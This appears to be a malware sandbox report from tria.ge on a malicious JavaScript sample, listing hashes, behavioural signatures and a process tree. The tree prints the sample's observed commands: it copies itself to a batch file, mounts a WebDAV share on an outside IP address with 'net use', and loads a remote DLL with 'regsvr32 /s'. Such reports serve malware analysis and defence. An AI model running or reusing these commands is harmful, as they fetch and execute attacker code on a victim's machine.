Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/07/2024, 09:26

General

  • Target

    155945859957932489.js

  • Size

    5KB

  • MD5

    02db4fd1a39cf089e9ed8e1c21a6d26e

  • SHA1

    49812f6cbd0694b3a57d21e8c92c8370fcf1ac9e

  • SHA256

    522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec

  • SHA512

    9d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad

  • SSDEEP

    96:E5SNRNRZ/viEAwNNq700XA4Nq7008xJBdUjObreVKLVE1T0rQjMDu80+7VGnDuse:QeR1qEpNN600XLN600QGAg76VHdFka

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\155945859957932489.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\155945859957932489.js" "C:\Users\Admin\\xnsbwi.bat" && "C:\Users\Admin\\xnsbwi.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4716
      • C:\Windows\system32\net.exe
        net use \\45.9.74.13@8888\DavWWWRoot\
        3⤵
          PID:2592
        • C:\Windows\system32\regsvr32.exe
          regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\554.dll
          3⤵
            PID:3900

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\xnsbwi.bat

        Filesize

        5KB

        MD5

        02db4fd1a39cf089e9ed8e1c21a6d26e

        SHA1

        49812f6cbd0694b3a57d21e8c92c8370fcf1ac9e

        SHA256

        522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec

        SHA512

        9d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad